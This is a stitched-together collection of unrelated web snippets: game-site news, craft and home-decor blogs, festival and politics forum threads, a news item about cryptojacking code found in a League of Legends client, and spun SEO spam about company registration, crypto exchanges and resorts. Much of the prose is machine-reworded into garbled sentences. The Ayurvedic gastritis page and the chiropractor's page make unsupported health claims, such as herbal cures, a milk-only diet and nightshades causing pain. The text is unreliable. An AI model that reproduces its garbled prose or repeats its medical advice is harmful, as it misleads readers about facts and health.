You have 14 minutes 39 seconds from the viewing of this news post to hurry to Dragon Quest and see if you can make it through the next ten levels.
Whoa...looks like someone's struck the mother lode. Do you think this will be enough to satisfy a dragon's greed for awhile?
Ooo...another beautiful gemstone for your dragon to collect. I wonder where all of these are coming from.
Ahem...so as not to steal anyone's limelight (see news post below), this is just a little blurb to say that a Cut Citrine gemstone was found restocking in Evoington Jewels this morning.
The Support Team would like to recognize her supreme moderation skills by awarding her the Heart of a Dragon Trophy for her Trophy Case!
But a rather spifftastic one to celebrate our returning games has taken its place. Numfar, do the dance of joy!
Since that someone recently said, "I don't even want to hear about it," we won't mention any names. But maybe you can figure it out.
Yes it's another news post about the layout! Now that the layout is finished, there are some minor image tweaks to do. I wanted to bring to your attention the updated User Home. We've replaced all those buttons from previously with new ones and we've grouped the ones that are to do with your account. When you get a chance stop by and leave your thoughts on whether you like this or not and if there's something you want to see - just let me, Angelnic, know!
Yep, that's right. Everyone's favorite quest has returned with a new twist. To make you shiver with anticipation, DQ will only release 10 quests per week. And, there will be new fantastic prizes that go beyond a high score table. It will be possible to win avatars and trophies and amazing wonderful things! Are you ready? Head over and finish you first 10 levels now!!
If you're paying attention, you might notice some old faces returning. Also, some changes may or may not have been made to the prizes you can win in some of the old favorites. You should try it out and see what you like! Some of the high scores tables have been reset as well, to give everyone a fresh start to finally beat some of those old timers!
There's a rumor that there are new hidden avatars to be found. I'm not sure my Source is all that reliable though. Rabbit around and see what you can find.
This recipe is formulated to hydrate and fortify the skin, loaded with natural hydrating elements absorbed very quickly by the skin due to its natural formulation. Reduce fine lines and smooth the skin tone. Minimized pores after three weeks' application. This fragrance-free version of our day lotion will be a great choice for sensitive or eczema skin.
Today I'd like to show you a one of a kind baby boy shower. The typical blue, blue/brown boy showers are cute don't get me wrong but it's always exciting to see people take the typical to the next level and that's exactly what Lindsey of Out of Alabaster did for her sister!
Love the use of succulents as centerpieces, vintage paper details through out and that frame from Ikea!! Why can't there be an Ikea near me?
I'm thrilled to be joining with Marilyn from The Artsygirl Connection in capturing Christmas!! I had thought briefly about doing something special for Christmas and when Marilyn asked me to partner with her I thought it a fun and perfect idea! Here's what we've planned...
Every Monday between November 20th and December 20th there is going to be a themed link party where you link up your projects. The last link will be a link up for all our projects.
Dec 5th-link up a photo that captures how you celebrate Christmas or shares a favorite Christmas memory or
oh my! i love it! very creative and the colors go perfect with each other! Thank you for posting this!
Aaaand, I'm excited for the Christmas bash :D Whoo! We put our tree up last night, so I'm in the Christmas mood now!
Welcome to Vintage Gwen! My ultimate loves are Christ, my husband, and my Lil’ Hunkie. Vintage Gwen means ‘the best of me’, ‘classic me’, the ‘distinctive me’! I hope we can be creative and inspired together!
Where is Roadwolf? | Contact | Help | World Clock | Converter Tool | Motorcycle Mirrors | Motorcycle Forums | Tech Repository | CC Members Facebook Group | Badges
Terms and Conditions | Privacy Policy | Cookies | Mototribe® is a Registered Service Mark of Cruiser Customizing Inc. | Drupal Enterprise Cloud Hosting by Pantheon
In total there are 0 users online :: 0 registered and 0 hidden (based on users active over the past 5 minutes)
ثبت علائم تجاری I had some business down at the county seat the other day. After i was paying a bill at the window, I noticed a sign that said business lists must be purchased using cash potentially credit card.
How to make this exercise: Use a unique piece of paper for each item. Set a timer for 5 minutes for each question, and write down as numerous as you can think of on each topic including thoughts, examples, things you have seen others doing that you like or can't stand. Write things down even if they seem 'not exactly right' because better you write, the more you will think of. This exercise is meant to convince you thinking, and none of the answers are positioned in brick. You can narrow down your emotions at no more each brainstorming exercise. As an artist and businessperson, noticing change and grow as you become more found. Keep your lists in a binder include to because progress with your business. Review them now and again to refresh your focus and your enthusiasm.
There can also be startup related points I could make here, like joining an existing startup as the "volunteer" with regard to time, in order to learn another recommendation of what is essential. Also, in most geographies, are generally organizations springing up, and university workshops, to mentor people out of work and contemplating a new venture. Get some help from them in case you it.
First select the best company and matching website. The names don't have to match, nonetheless sure makes branding and recognition easier if subjected to testing at least similar. Starting and name a company today is often a world-wide substitute. Make sure the names don't have negative and even obscene connotations in another language.
The clerk gave me one item of valuable information - a lot of that new سامانه ثبت شرکت lists were http://www.irancorporate.ir/ available every month's time. Eg, if I came down in September, I could purchase an email list of all the businesses were being registered in August.
Of course, you can pick buying a register brand computer help make matters windows 7 faster. Nevertheless it is not your best choise discover will also cost you additional dollar bills. Besides, no matter how quickly a new PC could be, it truly is going surely read more and more slow at some point. So it does not imply that essential to require to optimize it again.
There are thousands of web sites advertising just that. So they choice info the next best advertising, and check out a appealing landing-page. Explain how it works find something that??
Whether by crafting a great new name or wresting one caused by a previous owner, every new customers needs to perfect the domain game early, and it need not break your banker. Spending big money up front, or changing domains around the line are both painful and dear. Have you done the proper homework about your preferred website name? ثبت شرکتها
Philippines’ League of Legends has removed crypto-mining malware from its gaming client after an attack that lasted two days.
Security engineers of the Philippine community of major multiplayer video game League of Legends (LoL) have removed Coinhive crypto mining code from its Garena client June 11, according to an official statement from the group’s Facebook.
On July 9, Monero (XMR) mining malware Coinhive was first detected on the LoL client by a player who posted about the issue on the League of Legends subreddit.
According to the group’s Facebook statement, the recent case of Coinhive cryptojacking was caused by “unauthorized modification of the League of Legends PH client lobby where a certain javascript code was inserted.” Garena noted that apart “increased CPU usage,” the security experts found “no other impact on affected computers.”
Founded in 2009 in Singapore, Garena is a platform provider based in Asia. Garena offers gaming platforms for multiplayer online battle arena games League of Legends and Heroes of Newerth, as well as the online soccer game FIFA Online 3, and shooter games Point Blank and Alliance of Valiant Arms.
Cryptojacking malware activity has reportedly surged by 629 percent in the first quarter of 2018, with Monero mining Coinhive going epidemic on the Internet. However, the volumes of Monero generated from malicious cryptojacking amount to just around 5 percent.
On June 12, Japanese police started investigating a case of cryptojacking involving Monero-mining software Coinhive, which became the first criminal case involving cryptocurrency mining in Japan.
Subsequently, on June 16, Japanese prosecutors from 10 prefectures arrested 16 individuals suspected of involvement in an ongoing criminal case of cryptojacking, with the Sendai District Court eventually sentencing a 24-year old of the city of Amagasaki in Hyogo prefecture to one year in prison.
The blockchain is undoubtedly an more potent engineering. In essence It's really a shared, trusted, general public ledger that everyone can inspect, but which no single person controls. The individuals within a blockchain technique collectively retain the ledger up-to-date: it may be amended only according to strict rules and by basic agreement.
I wrote back and instructed zero404cool to Google my name, that will help him choose if he could rely on me. He’d see which i was among the first editors of Wired, coming on board in 1993.
This was where by I Unquestionably mustn't unplug the Trezor. (I remembered a warning Andreas had specified me: “Energy decline in the course of the firmware upload is catastrophic, you may eliminate all your info.
We Review the real time price presents of numerous exchanges, so you do not really need to waste your time and energy. For each calculated amount, it is possible to notice the precise calculation. Begin to see the provided price tag, exchange costs and payment expenses.
The challenge is I do not know you. I don't know In the event your story is actual or not. I don't even know Should you be an actual one that actually owns a Trezor. Such as, You could potentially as simply inquire this to hack into some other person’s unit. I can not permit that.
The Trezor website stated that these 24 phrases were being my Restoration terms and could be accustomed to make the learn personal key to my bitcoin. If I dropped my Trezor or it stopped Doing work, I could Recuperate my bitcoin by getting into those 24 words and phrases into a new Trezor or any one of the a number of other hardware and on the net wallets that use precisely the same conventional crucial-era algorithm.
Welcome to our page for finding the ideal spot to market your Bitcoins! This Software has been in development considering that 2016 and We've got place emphasis on reliability, excellent, adaptability and transparency with the output effects. This is certainly why we get noticed when compared to all read the article other Internet sites featuring equivalent expert services.
We've got squandered more than enough cash by shopping for and promoting on the incorrect exchanges. You will discover Bitcoin exchanges providing wonderful premiums but have horrible expenses. On the exact same time, there are actually other crypto-exchanges, where the prices are plain bad As well as in precisely the same time they advertise 0% charges.
Subsequent Saleem’s Recommendations, I copied a string of text from the terminal window and additional it to your Linux command Saleem experienced equipped. The PIN appeared immediately.
Like all ChartIQ markers, the thing alone is managed because of the chart, so whenever you scroll the chart the item moves with you. It is usually destroyed instantly for you personally in the event the image is transformed.
“I believe the large difficulties are finally the believe click this in difficulties,” he says. “There’s nothing there to back again it up. I do know the counterargument, that that’s accurate of fiat funds, much too, but that’s entirely Erroneous. There’s an entire trust material that’s been recognized by authorized mechanisms.”
While in the little bit gold proposal which proposed a collectible market place dependent system for inflation Command, Nick Szabo also investigated some additional enabling aspects including a Byzantine fault-tolerant asset registry to retail outlet and transfer the chained evidence-of-get the job done answers.[5]
Aside from the Original cost present, there More Info are two kind of fees involved in the calculation: transaction fee and price over the payment method. The fee over the payment technique is taken to settle the cost of employing a given payment process like PayPal, Visa or Grasp Card. The transaction or Trade price might be witnessed since the sum wanted with the exchange to work.
Properly, plenty of is plenty of! Any longer you can easily use our Device to match what each Trade is bidding and discover the ideal System to provide your Bitcoins. Final result: Get the maximum worth out within your Bitcoins!
Powered by django-wiki, an open source application under the GPLv3 license. Let knowledge be the cure.
If you think your psychological assets has very long been infringed and want to file a criticism, make sure to see our Copyright/IP Prepare
When inspecting automobile rental expenditures in Cancun and building a reservation by this Site, you might be in fact scheduling especially with important product rental motor vehicle corporations, but with our discounted code (FERALTAR) embedded all through the Online web page deal with.
Surrounded by lush tropical gardens, the Riu Lupita in Playa del Carmen provides 24-hour gastronomy, all-inclusive attributes and exquisite providers. Lounge in roomy resort rooms, that includes garden sights; tee off in regards to the neighboring
Riu Emerald Bay faces the dim-blue waters during the Pacific, and delivers plenty of possibilities and services for everyone’s amazing getaway holiday. The family vacation vacation resort, located on the most effective Seashore for surfing, features a wide array of watersports and actions.
The Riu Palace Aruba delivers impeccable services along with the easiest level of facilities. Pals can get pleasure from swimming swimming pools, a spa in addition to a energetic casino. Furthermore, the vacation resort options a number of gourmet and themed locations to consume, numerous lounges and several leisure options.
The elaborate capabilities two new-water swimming pools, a solarium terrace, wellness Centre and a vast Seaside for calming towards your sounds within the ocean.
Underpinning Electronic payments is among the whole world’s most Advanced processing networks—VisaNet—and that is effective at managing check here increased than ten,000 transactions a second, with here fraud protection...Study Much more
We pre-negotiate every year Along with the foremost nationwide product car or truck companies to provide the lowest and least expensive priced Cancun rental car or truck rates possible.
Riu Palace Cabo San Lucas delivers swim-up suites with A personal pool on the bottom amount overlooking the gardens. RIU's renowned, all-inclusive theory provides amazing having at several different eating places, limitless leisure routines and nightly enjoyment.
This all-inclusive resort is positioned in the seafront in The gorgeous location of Guanacaste, amidst tropical palms and lush gardens. The family vacation vacation resort delivers a giant number of watersports and routines like diving, kayaking and windsurfing, and tennis and Seashore volleyball.
Traditional BB lovers were delighted to observe TCL introducing a continuation to their classic BlackBerry Keyone which ended up to …
Regardless to the fact that below 1 million BlackBerry KEYone devices were shipped in 2017, the handset remains to be …
At present BlackBerry, Motion is widening their reach to go over 28 Western nations(EU) and also TCL additionally preparing their …
Android Oreo 8.0 is officially declared by Google. From now on Oreo fans will be eagerly waiting for the arrival …
We shared an article a few days ago related with a bug problem on the Blackberry KEYone sold by Sprint …
Sprint Corp, generally known as Sprint, is a United States telecom firm that delivers wireless services. It is the fourth …
BlackBerry has launched a brief advert video clip throughout their social networking channels. The video clip emphasizes primarily on two …
Google Just beneath, are numerous entirely not connected internet sites to ours, however, they are...
When she and her daughter first moved into this two-bedroom, one-bathroom apartment in Mesa, AZ, actress and stylist was pinching pennies. She would collect change here and stuff loose dollars into piggy banks there, all in hopes of decorating her new home to her heart’s content. Most days she would pin pictures to her inspiration board hoping one day she’d be able to bring her dream home to life. Thanks to some serious patience and determination, all of her saving slowly began to pay off. Though it took time, she was finally able to start crafting the retreat of her dreams.
Just because she had the funds didn’t mean she was going to blow it all on one piece, though. Ashley knew she would have to stretch every dollar if she was going to afford herself the eclectic, streamlined look she loved. And it all started with some baby aloe vera plants she came across online. “Those free plants truly lifted our morale and aesthetic,” Ashley explains. They added to the calming vibe she hoped her home would embody, the plants kept her and her daughter company until Ashley came across the pieces she wanted at the right price. A thrifted Eames chair, secondhand leather sofa and a discount side table are just some of the pieces she’s tracked down to fill the space. Paint has also proven itself to be another cost-effective tool in adding visual interest to the space. A rich, black hue skims the kitchen, and the bedroom’s accent wall doesn’t disappoint.
Nowadays, the soothing apartment has welcomed Ashley’s husband and his son Hudson into its warm embrace. It’s not uncommon to find the foursome cooking together in their bright kitchen or cozied up together on the couch. Whatever they are up to, one thing’s for sure: it’s all thanks to the cleverness of one smart saver. Click through to take a look at the entire home. Enjoy! —
Ashley designed her and Nathan's bedroom to resemble a "swanky hotel" so when they step inside it's as if they're escaping on a vacation. The walls are painted in Behr "Onyx," and the fur pillows are Kenneth Cole Reaction.
It wasn't that long ago that Nathan and Ashley were pinching pennies. By saving coins in jars, shopping discount stores and browsing Craigslist, however, the pair have been able to craft a sweet, eclectic retreat from Arizona's most blazing days.
When Ashley came across this side table at Tuesday Morning, she couldn't afford to take it home. Convinced it had to be in the family, she talked her sister into buying it. After some time, a tiny flaw in the top began to bug her sister, and *poof* it was Ashley's. The piece hanging above it was painted by actress Francis Farmer in 1964, and Ashley picked it up at Silverlake Antiques.
"We love food. The more avant-garde and obscure, the better. I'm a decent baker, and he can grill, bake, or boil anything with scales or claws. We make a good team in the kitchen. Hudson and Ambra love helping us prepare food as well. Even though they slow down the process, we think cooking and cleaning are important life skills to teach them at a young age," Ashley tells us.
The family enjoys most of their meals here around this vintage dining table. Ashley tracked it down online while living in New York City.
The natural light streaming in from the sliding glass doors makes everything in the room seem "crisper and lovelier," Ashley tells us. It's not uncommon to find the family lounging here on their sofa -- a Craigslist find -- watching movies or snuggling into its West Elm pillows for a good read. The painting that overlooks this living room was a DIY project Ashley tackled. First, she had a larger-than life canvas constructed at The Home Depot. She then channeled her inner Franz Kline and let loose on the blank surface.
The CB2 coffee table doubles as a "cabinet of curiosities" featuring a candelabra from Crate & Barrel, antlers and other finds.
Arizona and citrus season go hand in hand. These beauties Ashley picked on her property enliven the living room with their sweet fragrance.
"What I love most about our home: is that we fell in love within these walls... all four of us." -- Ashley Yazzie-Ward
Ashley believes it's of the utmost importance that her daughter Ambra's room embodies the magic of childhood. Playtime can get a bit out of hand sometimes though. That being said, storage solutions like these metal lockers from Craigslist offer "... the perfect ratio of fun and orderliness."
An Urban Outfitters lamp sits next to a burgeoning plant Ambra diligently keeps watered. The metal bed frame is a Craigslist find.
Step to the left and Ambra can paint and draw to her artistic heart's content thanks to an easel from Dad. Step to the right, and it's time for a make-believe cook-off! Paper decorations by IKEA.
!!! Love spotlighting spaces designed on a budget — with minimal ikea influence. My place is still in progress because of budget contraints — one new project a month. Would love to know where the bedroom rug is from. I’m on the hunt for a good rug that won’t break the bank or shed all over the place (ahem, west elm).
It’s incredible what someone with fabulous taste can do to a basic apartment rental. No excuse for me! And thanks for the inspiration Ashley!
Great job! That dining setting looks very unique and special. I also like the Frances Farmer piece in the bedroom.
Well done you! I too love that floor plan. Only, I can’t seem to find space for the two children; are you having Hudson sleeping in the living room? It’s quite a small flat. The place has a wonderful vive and oozes the love and care that went into it’s furnishing.
Thank you for sharing this!!! I absolutely love seeing young families with stellar design sense making it work on a budget. More like this, please.
It is so inspiring to know that someone puts in so much character in a rental place. It gives me hope. It easy to feel disconnected to a rental space, not want to spend money on a property that’s not yours. Thanks for this.
Design*Droits-Humains reserves the right to restrict comments that do not contribute constructively to the conversation at hand, that comment on people's physical appearance, contain profanity, personal attacks, hate speech or seek to promote a personal or unrelated business. Our goal is to create a safe space where everyone (commenters, subjects of posts and moderators) feels comfortable to speak. Please treat others the way you would like to be treated and be willing to take responsibility for the impact your words may have on others. Disagreement, differences of opinion and heated discussion are welcome, but comments that do not seek to have a mature and constructive dialogue will not be published. We moderate all comments with great care and do not delete any lightly. Please note that our team (writers, moderators and guests) deserve the same right to speak and respond as you do, and your comments may be responded to or disagreed with. These guidelines help us maintain a safe space and work toward our goal of connecting with and learning from each other.
Gastritis is a common name for all kinds of inflammation of the inner lining of the stomach, which is known as the mucosa. It is characterized by severe stomach ailments like cramps in the stomach, diarrhea and constipation and even blood with the stools.
In Ayurveda, gastritis is known as Urdhavaga Amalapitta. It is caused in people with pitta constitution. When the pitta dosha gets vitiated in such people, there are greater chances of getting gastritis.
There are many causes of gastritis. Food poisoning can lead to gastritis, and so can consuming alcohol and drugs like aspirin and steroids. Allergies to certain foods can cause gastritis. Oblique causes for gastritis are physical stresses caused due to flu, some major surgery, severe burns or injuries.
Nowadays the infection of the bacteria Helicobacter pylori is looked upon as an important cause of gastritis.
– Asparagus (Asparagus racemosa) Asparagus is known to be an antispasmodic. It reduces the fire in the stomach. The root of the asparagus is effective in reducing the hyperacidity of the digestive system.
– Bitter Chamomile (Matricaria chamomilla) The tea of the bitter chamomile is effective in allaying the gastritis that is caused due to tensions and worries.
– Fennel (Fenneliculum vulgare) Fennel is used as a digestive traditionally by Indians. After each meal, there is a tradition of chewing some seeds of fennel. Fennel soothes the stomach, facilitates digestion, reduces flatulence and relieves the stomach of excess acidity.
– Ginger (Zingiber officinale) The extract of ginger is effective in treating the acid dyspepsia that is associated with gastritis. It is especially useful for people who consume more of a non-vegetarian food.
– Indian Gooseberry (Emblica officinalis) The Indian gooseberry, or amla, is very beneficial in the treatment of several stomach ailments, gastritis included. The other digestive ailments it is used for dyspepsia, burning sensation, anorexia, vomiting and hemorrhage.
– Licorice (Glycyrrhiza glabra) The root of the licorice can soothe the inflammation and the injury to the stomach. It is also known to reduce the proliferation of Helicobacter pylori.
– Rhubarb (Rheum emodi) Rhubarb is a mild agent; so it is effectively used in treating gastritis problems in children. It can reduce the acidity in the stomach.
– Sandalwood (Santalum album) Sandalwood helps in gastritis because it has cooling properties. It can soothe the stomach muscles inflamed by gastritis.
– Among vegetables white pumpkin, bitter gourd, cucumber, green banana and banana flower are effective.
– People suffering from gastritis must not confuse their stomach glands with different kinds of foods at the same time. It is beneficial if the person is kept on a single diet. Ideally the person must be kept on a milk diet or on a diet of old rice.
– Vitamin C has the capacity to help in the absorption of iron and calcium salts in the body. This eases the digestive process. Therefore, the diet must be rich in vitamin C. Foods that contain vitamin C to a commendable quantity are amlas, oranges, etc.
– Pungent and sour tastes must be avoided. Even chocolates, tea and coffee must be avoided as these can increase the acidic contents in the stomach.
– The person must never eat till the stomach is fool. In gastritis it is better to eat little quantities each time, so that the stomach gets proper time to digest the food.
If there is constipation along with gastritis, then Avipattikara choorna is taken as the medicine of choice. The dosage is two teaspoonfuls at bedtime.
– Take one teaspoonful of licorice root powder and mix it with pure ghee and honey. Take this twice each day on an empty stomach.
– Have a banana early in the morning. Drown them with milk. This reduces the acidity within the stomach in some days.
– Squeeze the juice of an orange and add some roasted cumin seeds in it. Have this with some salt in it. It provides immense relief in gastritis.
Apart from these, keep the mind always stress-free. Do not go to bed immediately after a meal. There should be an ideal gap of an hour between taking a meal and going to bed.
has a Hello Kitty imprinted guitar. I think it was on seeing that at the first Indietracks that I resolved never to tell several mates where I'd been that weekend.
JAG, but I'd like to get other people's perspective on this (and an answer to why Blogger adds all that blank space above a basic HTML table)
(Pedant note: inflation isn't really an appropriate term to use in this context, in that it refers to a general increase in prices rather than an increase in price for one type of good (festival tickets)).
And here's the kicker. The festival experience in most cases has not improved for the customer. It could easily be said to have gotten worse.
The more interesting thing is that even though you are paying more- You aren't actually getting more.
There are only so many bands one person can see in a three day festival, yet as prices and capacities have increased, the length of festivals have not, - neither have the licensing hours, the stages all pretty much stop at the same time they always did.
I don't object to price rises if it means the value of what i am receiving has increased, but it's hardly the case here.
Though having just checked, Reading was £80 in 2000 and £125 in 2005. I think the interesting thing there is in a lot of the mid-range festivals, stuff like Wychwood (three stages, 2010 headliners are the Levellers, Happy Mondays and Seth Lakeman) being £110, and then things like the quite traveller-aimed Solfest and long after its boom Creamfields being among the biggest percentage increases. If I had space I'd have liked to do a more encompassing version. Secret Garden Party was £137 last year, up £42 in two years!
I know I'm more or less dead now at the age of 30 and tastes change, but the line-up seemed better back then too. It wasn't just guitar based chart fodder.
to try and see whether your judgement was like nostalgia or reality. Reading hasn't altered at all really in what it appears to offer (I've never been.)
Seemed like it was a slightly boring one with all the best, most cutting-edge bands at the bottom (Reef and Cast) then...and looks about the same this year!
We should have some sort of oneupmanship competition with the Carlsberg Stage lineup. Never mind the Super Furries, who the sod were Crazy Gods Of Endless Noise?
However, I am very partial to a bit of obscure Britpop and they genuinely did look like the best on the line up!
But not all bands are created equal. So it's too simplistic to say that you don't get more bands for your money. Facts would suggest that the value of festivals has increased for people (subjectively). It's an interesting sociological point, that the demand for festivals seems to have increased substantially in the last decade or so. Prices rise quite rapidly with quanities remaining constant or increasing in the main. I guess you might just feel a little disenfranchised if you'd always favoured festivals, when they were less popular, as you now have to pay more to attend them simply because more other people are interested as well. Good point about examining further back too (10 years, 20 years etc).
which means there isn't a single festival that has decided to increase ticket prices in line with inflation.
Things like technological products and clothes have fallen in price, largely due to increased efficiencies in production and the move to cheaper labour markets. On the other hand music festivals are reliant on labour that can't easily be replaced by cheaper alternatives, and the bands themselves are seriously upping their live fees to offset the loss of recording income. And it's not easy to streamline a bands touring costs or make efficiency savings. Though I suppose they could always play their set quicker.
but don't forget to take into account that the pound is a lot weaker against the dollar these days as well.
too many factors to make a clear cut statement that everything is overpriced. I mean CDs are a lot cheaper now than they were before, the internet has made music a lot more accessible and bands have to make money somehow, so live shows seem to be where its at for them.
to a whole generation of people who want to have their weekend of abandon within a carefully controlled environment of mass-selling lagers and Cath Kidston wellies.
and you'll soon see the extent of this trend. You'll be surprised how many people that you'd never think to describe as being 'into music' have at least one set of photos showing them all poncho'd up, standing proudly next to their MyHab at Reading, Glasto, V Fest, etc.
Glasto wasnt a mega-fortified quasi-interenment-camp-for-hippies until about 10 years ago and the local council have fired demand after demand upon it every year it also expands its site size by a similar amount to the ticket price each year. (Its increasin gly apparent this is not the popular way to do things-witness the popularity of latitude and other smaller festivals etc).
"US President George W Bush has accepted that the decision to invade Iraq was based on faulty intelligence"
This doesnt mean he has to resign, The public elect governmenst for such reasons and therefore the public has no right to be consulted on the reasons for going to war.
can there be a global fascist movement if there are so few or even no states that operate under what can be described as fascism and such states have minimal collabaration between them. In fact global unity is still not very strong.
What we should be more worried about is the global acceptance of neo-liberal economics and the rapant oppression of the industrial process. There is a much larger econmic consesus in the world than there is a social one.
part of the globe which isn't under the economic, cultural or political influence of the US Administration?
I'll take out economic because I've already said that I believe there is a global econmoc consensus. Now depending on how you define it, Bhutan, for example, or North Korea have no cultural links to America, and I could name more. And there are a large number of countries who are politcially independent of and opposed to, America; Iran, North Korea, Cuba, Burma for example.
I was just naming major countries, if I wanted to be pedantic I could refer to isloated tribes or tiny islands to contradict your claim.
the sad state of affairs is that that probably is the case. Countries may not want to be with or against the US but just like with people, individualism is dying, and it will be hard to save it.
implies complete control over every sphere of life. Now if we use your divisions of economic, culutural and political life then for each of them there exists an idea of you are with us or against us but a country can be, for example, with the US in economic affairs but against them in political affairs. In addition to this the level of dominance in the fields varies dramatically. American culture is nearly universal, US free market policies have taken over a high number of countries, and US politics still has a number of enemies. Therefore I reject the idea of totalitarianim on the grounds that totalitariansim has never and will never exist under its standard definition for there will always be one outpost of resistance. But this level of resistance in the modern world is getting smaller and smaller but I don't believe that it will ever reach zero.
but in effect there is no real resistance or alternative in the sense of any balancing opposition - or any credible opposition whatsoever - to the vociferously aggressive, pre-emptive, militarily driven administration that currently has power in the US.
And by that I don't mean a partisan position - I mean moreover a long history of behind the scenes covert activity which lies at the base of the current US administrative architecture.
The US has also become the largest donor to so many institutions that seemingly oppose this form of 'totalitarianism' that many such organs would simply cease to exist if they pulled their funds - the IAEA being a good example.
and under the system of government that countries such as America operate upon, the only intereaction with the government that the public has is through elections. The public do not get a say in individual decisions of that government, now you can say that they case should be different but as it stands it is not.
Under democratic systems the public have no or little absolute right to be consulted on decisions of policy. Tbe way to show disapproval is by voting the incumbents out of office.
Therefore GWB (and the legislature for war) can basically do as they see fit for reasons of their own choosing...
the system in place is not a democracy - it is a system of democratically held elections - a true democratic system is one which is based on precisely the public having right to be involved on decisions of policy
secondly, what we are actually discussing here is an administration which without doubt sees itself as above the law and so cannot be trusted to in its claims to have rightfully won elections
Even putting aside for a moment the possibility that elections can be (and often are) rigged, votes can be bought in many other less transparent ways through so-called dirty tricks, disinformation and manipulation of the media to give a few obvious examples.
I accept they have the authority to do what they please within their OWN borders and under their statutes of law - but what mandate do they have to do their deeds OUTSIDE of their own borders and outside of international law
that with GWB's 'acceptance' that the intelligence was false, the logical interpretation is that the entire premise for pre-emptive war with Iraq must be accepted as false - namely the underlying reasons for the UN resolution; weapons of mass destruction and non-compliance with weapons inspections
If the UN general assembly was technically a court of law (which of course it isn't) then the US Administration is quite clearly guilty of perverting the course of justice
you can detune your sofa from the frequency of the wahing machine spin by adding a mass on a spring to the sofa.
Unless the sofa is wobbling as a result of the floor wobbling... in which case you need to do that to the floor!
I'm also trying to sing, I have a tune called "100 takes" because I'm sure it'll take 100 takes to get the vocals down in tune.
I seem to remember it took Embrace about 14-odd takes on one of their tracks (as relayed by Darren Hefner).
I only ever like to take one vocal take. I hate to have to listen back and try to correct things. I prefer the mad live sound.
is a first floor flat only. Their washing machine shares a wall with my bedroom. The inhabitants of the flat are nocturnal. My bedroom often resemples a scene from the exorcist.
Mine is old, though, so probably not. The 'these days' comment was suggestive of the ones made these days, not that all washing machines in existence have gradually got faster as time's gone one.
And a couple of times she's done one of those washes where she's left the drum full of water so the clothes don't get creased or something...and then forgotten to do the rinse cycle and just flooded the kitchen! RAWK!
This is the Dr. Suzan J. Smith Website. Dr. Smith is a Chiropractor and yoga instructor in Carrollton, Texas.
According to the National Institutes of Health, nearly 50 million American adults have chronic pain or severe pain. The conventional medical model teaches us to reach first for medication to relieve pain, with ibuprofen and other NSAIDs (nonsteroidal anti-inflammatory drugs) at the top of the list. However, with research mounting to show NSAIDs have a notable list of dangers, it makes sense instead to look for the root causes of pain.
Many people turn to NSAIDs for relief from pain and inflammation. Common NSAIDs are ibuprofen (Motrin, Advil) and naproxen (Aleve). Celecoxib (Celebrex), diclofenac (Cataflam, Voltaren) are prescription NSAIDs. Aspirin is an NSAID, but it does not pose the same risks for stroke and heart attack.
Ibuprofen is metabolized by the liver, and can cause lesions, liver failure, or jaundice over time. The FDA has even warned against NSAIDs because they increase the risk of heart attack and stroke.
In leaky gut, the lining of the small intestine becomes damaged and overly porous, allowing undigested food, bacteria, yeast, and other pathogens into the bloodstream. This triggers inflammation and pain throughout the body — the same thing people use NSAIDs to relieve.
When pain is treated with NSAIDs, it typically comes back when the medication runs out. However, in functional medicine the goal is to identify and address the cause of the inflammation and pain instead of simply putting a temporary Band-Aid on it.
It’s understandable to want relief so you can feel and function better. The good news is many people find their chronic pain diminishes substantially or disappears completely when they adopt functional medicine strategies.
Anti-inflammatory diet. Remove foods that trigger inflammation, such as gluten, dairy, grains, legumes, eggs, sugar, and nightshades. This is typically done as an elimination and reintroduction protocol where you follow the diet strictly for a period of time and then customize it depending on your food sensitivities.
Avoid nightshades. Vegetables in the nightshade family can cause pain and inflammation in the joints. These include eggplant, potatoes (but not sweet potatoes or yams), peppers, tomatoes, tomatillos, hot pepper products and pepper-based spices. Simply removing nightshades from the diet has brought relief from joint pain for many, especially those with rheumatoid arthritis.
Turmeric and resveratrol. Each is a powerful anti-inflammatory alone, but research shows that taking them together is much more effective, making them potent tools for quenching the inflammation and damage associated chronic inflammatory disorders.
Improve your posture. Chronic pain can develop due to spinal misalignment. Rarely do patients with chronic pain have even pressure on both feet or eyes that move in synchrony. Many patients experience significant or total relief of chronic pain by addressing these imbalances.
Nutrients that fight inflammation and pain. These include vitamin D, vitamins A, E, and K, and plenty of omega 3 fatty acids.
Moderate to high intensity exercise can help reduce inflammation. It also improves insulin sensitivity, a bonus for diabetes prevention. Just make sure to choose exercises that do not exacerbate joint pain; there are lots of options.
Balance your blood sugar. Many people have blood sugar dysregulation issues that contribute to systemic inflammation and pain. In addition, imbalanced blood sugar is one of the risk factors for Alzheimer’s and Parkinson’s.
Support production of SCFA. Short chain fatty acids (SCFA) produced by your “good” gut bacteria are helpful in dampening inflammation. Eat abundant and varied fresh vegetables daily, eat probiotic-rich fermented foods, and take SCFA-supporting supplements such as butyrate, Saccharomyces boulardii, Lactobacillus sporogenes, and DDS-1 Lactobacilli acidophilus.
Support glutathione. The most important antioxidant in your body, glutathione aids in detoxification, helps maximize immune system function, and shields cells from damage caused by oxidation and inflammation.
A healthy body makes enough glutathione, but faced with chronic stressors such as toxins, poor diet, sleep deprivation, smoking, and excess sugar, glutathione become depleted.
Glutathione supplements are not effective taken orally. Instead, boost glutathione levels through a liposomal cream, suppository, nebulizer, or IV drip.
One must also support glutathione recycling to balance the immune system, protect body tissue from damage caused by inflammation, and help repair damage.
To enhance glutathione recycling, remove stressors depleting glutathione levels such as lack of sleep, smoking, food intolerances, diets high in sugars and processed foods, and excess alcohol intake.
These are just a few ways to use functional medicine to address the root causes of inflammation and pain so that you can stop taking NSAIDs. Ask my office for more advice.
Synopsis:A.X.L. is a top-secret, robotic dog who develops a special friendship with Miles and will go to any length to protect his new companion.
Over the course of his eminent career, Michael Shrieve has written, produced and played on albums that have sold millions of copies worldwide. As the original drummer for Santana, Michael – at age nineteen – was the youngest performer at Woodstock. He helped create the first eight albums of this seminal group, and was on the forefront of shaping a new musical era.
Michael is respected world-wide for his adventurous experimentation with the most creative and masterful musicians. No other drummer has collaborated with such longevity and sophistication alongside artists in such diverse genres as rock, jazz, electronic, DJ and world music. He is well recognized for his groundbreaking adoption of electronic percussion when it was a new medium in the 1970s.
Michael Shrieve also composes music for film and television. He worked with the director Paul Mazursky on the film, “The Tempest,” and scored music for Curtis Hanson’s “The Bedroom Window,” as well as numerous television movies and shows. In 2002 Michael wrote and produced the song, “Aye Aye Aye,” with Carlos Santana, which appeared on the album, “Shaman.” Rolling Stone magazine acknowledged it as one of the songs that “leaps out of the album, joyful and organic without calculation,” and achieves “globe-spanning euphoria.”
